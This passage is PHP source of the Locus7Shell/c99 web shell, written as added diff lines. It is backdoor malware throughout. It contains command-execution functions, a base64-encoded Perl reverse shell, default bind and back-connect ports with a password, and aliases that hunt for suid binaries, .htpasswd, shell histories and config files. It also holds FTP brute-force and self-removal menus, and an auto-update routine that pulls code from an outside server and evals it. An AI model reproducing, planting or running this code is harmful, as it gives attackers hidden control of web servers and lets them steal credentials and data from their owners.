array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. 
array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = "<a href=\"http://locus7s.com\">x2300 Locus7Shell v.".$shver."</a>: access denied"; + +$gzipencode = TRUE; //Encode with gzip? + +$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) + +$c99sh_updateurl = "http://locus7s.com/files/lshell_update/"; //Update server +$c99sh_sourcesurl = "http://locus7s.com/"; //Sources-server + +$filestealth = TRUE; //if TRUE, don't change modify- and access-time + +$donated_html = "<center><b>x2300 Locus7Shell Modified by #!physx^ </b></center>"; +/* If you publish free shell and you wish +add link to your site or any other information, +put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "user@host.tld"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = TRUE; //If TRUE then save sorting-position using cookies. + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... 
+// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); +if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} +$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); +if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} +$dizin = str_replace("\\\\","\\",$dizin); +$dizinispd = htmlspecialchars($dizin); +/*dizin*/ +$real = realpath($dizinispd); +$path = basename ($PHP_SELF); +function dosyayicek($link,$file) +{ + $fp = @fopen($link,"r"); + while(!feof($fp)) + { + $cont.= fread($fp,1024); + } + fclose($fp); + + $fp2 = @fopen($file,"w"); + fwrite($fp2,$cont); + fclose($fp2); +} + + + + +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); + +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: +0 - files and folders (as default), +1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "<b>" (default) + string {closetag} - close html-tag, e.g. 
"</b>" (default) + bool {break} - if TRUE and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example + array("config.php",1) // example +); + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8;// lines in hex preview file +$hexdump_rows = 24;// 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "c99"; // default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$datapipe_localport = "8081"; // default port for datapipe +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + +// Command-aliases +if (!$win) +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . 
-type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . 
-type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "dir"), + array("show opened ports", "netstat -an") + ); +} + +$sess_cookie = "c99shvars"; // Cookie-variable name + +$usefsbuff = TRUE; //Buffer-function +$copy_unset = FALSE; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), + array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), + array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), + array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), + array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), + array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), + array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), + array("<br><center><b>[Enumerate]</b>",$enumerate), + array("<b>[Encoder]</b>",$surl."act=encoder&d=%d"), + array("<b>[Tools]</b>",$surl."act=tools&d=%d"), + array("<b>[Proc.]</b>",$surl."act=processes&d=%d"), + array("<b>[FTP Brute]</b>",$surl."act=ftpquickbrute&d=%d"), + array("<b>[Sec.]</b>",$surl."act=security&d=%d"), + array("<b>[SQL]</b>",$surl."act=sql&d=%d"), + array("<b>[PHP-Code]</b>",$surl."act=eval&d=%d"), + array("<b>[Backdoor Host]</b>",$surl."act=shbd"), + array("<b>[Back-Connection]</b>",$surl."act=backc"), + 
array("<b>[milw0rm it!]</b>",$millink), + array("<b>[PHP-Proxy]</b>",$phprox), + array("<b>[Self remove]</b></center>",$surl."act=selfremove") +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/Next code isn't for editing\/ +/*function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +}*/ +/*function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} + +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(0); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +}*/ +/*function err($n,$txt='') +{ +echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=Verdana size=-2><div align=center><b>'; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '</b></div></font></td></tr></table>'; +return null; +}*/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and 
!preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://locus7s.com/\">x2300 Shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); + +if 
(!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+ $len = ceil($len/2) - 2;
+ return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return FALSE;}
+ else
+ {
+ if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+ elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+ elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+ else {$size = $size . 
" B";}
+ return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+ if (($o != ".") and ($o != ".."))
+ {
+ if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+ else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+ if (!$ret) {return $ret;}
+ }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+ return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+ if (($o != ".") and ($o != ".."))
+ {
+ $ret = TRUE;
+ if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+ else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+ if (!$ret) {return $ret;}
+ }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= 
DIRECTORY_SEPARATOR;}
+ return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+ if(copy($d,$t)) {return unlink($d);}
+ else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+ if (($o != ".") and ($o != ".."))
+ {
+ if (!is_dir($d.$o)) {unlink($d.$o);}
+ else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+ }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+ if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+ return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+ if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+ elseif (($result = `$cmd`) !== FALSE) {}
+ elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+ elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+ elseif (is_resource($fp = popen($cmd,"r")))
+ {
+ $result = "";
+ while(!feof($fp)) {$result .= fread($fp,1024);}
+ pclose($fp);
+ }
+ }
+ return $result;
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 
0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; 
$w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("c99getsource"))
+{
+function c99getsource($fn)
+{
+ global $c99sh_sourcesurl;
+ $array = array(
+ "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
+ "c99sh_bindport.c" => "c99sh_bindport_c.txt",
+ "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
+ "c99sh_backconn.c" => "c99sh_backconn_c.txt",
+ "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
+ "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
+ );
+ $name = $array[$fn];
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99sh_getupdate"))
+{
+function c99sh_getupdate($update = TRUE)
+{
+ $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
+ $data = @file_get_contents($url);
+ if (!$data) {return "Can't connect to update-server!";}
+ else
+ {
+ $data = ltrim($data);
+ $string = substr($data,3,ord($data{2}));
+ if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
+ if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
+ if ($data{0} == "\x99" and $data{1} == "\x03")
+ {
+ $string = explode("\x01",$string);
+ if ($update)
+ {
+ $confvars = array();
+ $sourceurl = $string[0];
+ $source = file_get_contents($sourceurl);
+ if (!$source) {return 
"Can't fetch update!";}
+ else
+ {
+ $fp = fopen(__FILE__,"w");
+ if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
+ else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
+ }
+ }
+ else {return "New version are available: ".$string[1];}
+ }
+ elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
+ else {return "Error in protocol: segmentation failed! (".$data.") ";}
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+ $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+ // retrive tables-list
+ $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+ if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by Locous7Shell.SQL v. ".$shver."
+# Home page: http://www.Locus7s.com
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")." 
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+ if ((in_array($tab,$onlytabs)) or (!$c))
+ {
+ if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+ // recieve query for create table structure
+ $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+ if (!$res) {$ret["err"][] = mysql_smarterror();}
+ else
+ {
+ $row = mysql_fetch_row($res);
+ $out .= $row["1"].";\n\n";
+ // recieve table variables
+ $res = mysql_query("SELECT * FROM `$tab`", $sock);
+ if (mysql_num_rows($res) > 0)
+ {
+ while ($row = mysql_fetch_assoc($res))
+ {
+ $keys = implode("`, `", array_keys($row));
+ $values = array_values($row);
+ foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+ $values = implode("', '", $values);
+ $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+ $out .= $sql;
+ }
+ }
+ }
+ }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+ $fp = fopen($file, "w");
+ if (!$fp) {$ret["err"][] = 2;}
+ else
+ {
+ fwrite ($fp, $out);
+ fclose ($fp);
+ }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+ $value = "";
+ if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+ $value .= "'".addslashes($v)."'";
+ if (!empty($functs[$k])) {$value .= ")";}
+ $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ 
mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+ echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+ if ($tbl_struct)
+ {
+ echo "<td valign=\"top\"><b>Fields:</b><br>";
+ foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+ echo "</td></tr></table>";
+ }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if 
(!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+ "METHOD"=>array(output_type),
+ "METHOD1"...
+ ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+ "SELECT"=>array(3,1),
+ "SHOW"=>array(2,1),
+ "DELETE"=>array(1),
+ "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+ $result["propertions"] = $types[$op];
+ $result["query"] = $query;
+ if ($types[$op] == 2)
+ {
